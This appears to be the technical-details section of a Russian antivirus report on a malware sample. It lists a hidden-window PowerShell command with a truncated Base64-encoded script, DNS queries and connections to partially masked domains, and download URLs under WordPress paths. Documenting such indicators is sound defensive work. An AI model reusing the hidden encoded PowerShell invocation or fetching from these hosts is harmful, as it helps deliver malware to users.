Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAHYAYgBlAHYAZQB1AHkAeAA9ACcATwBrAHkAeAB1AHoAegBhACcAOwAkAEIAaQBlAHYAbwBpAGwAdQBwACAAPQAgACcAMQAyADEAJwA7ACQARgB6AHUAcQBoAHYAZQBmAHQAcgB1AGwAbQA9ACcAUgB1AGQAbQB0AGgAawB6AHUAJwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\914774.cvr
- 'wl######a.000webhostapp.com':443
- 'bl##.##iminavarici.com':80
- '87##.com':80
- 'bb#.##rgmeier.media':80
- http://bl##.##iminavarici.com/wp-includes/fQbmzw/
- http://87##.com/wp-admin/be19e6-le6fjr-256/
- http://bb#.##rgmeier.media/wp-includes/runyp-zsv8cv-3508006/
- 'wl######a.000webhostapp.com':443
- DNS ASK ab###rique.org
- DNS ASK wl######a.000webhostapp.com
- DNS ASK bl##.##iminavarici.com
- DNS ASK 87##.com
- DNS ASK bb#.##rgmeier.media
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAHYAYgBlAHYAZQB1AHkAeAA9ACcATwBrAHkAeAB1AHoAegBhACcAOwAkAEIAaQBlAHYAbwBpAGwAdQBwACAAPQAgACcAMQAyADEAJwA7ACQARgB6AHUAcQBoAHYAZQBmAHQAcgB1AGwAbQA9ACcAUgB1AGQAbQB0AGgAawB6AHUAJwA...' (со скрытым окном)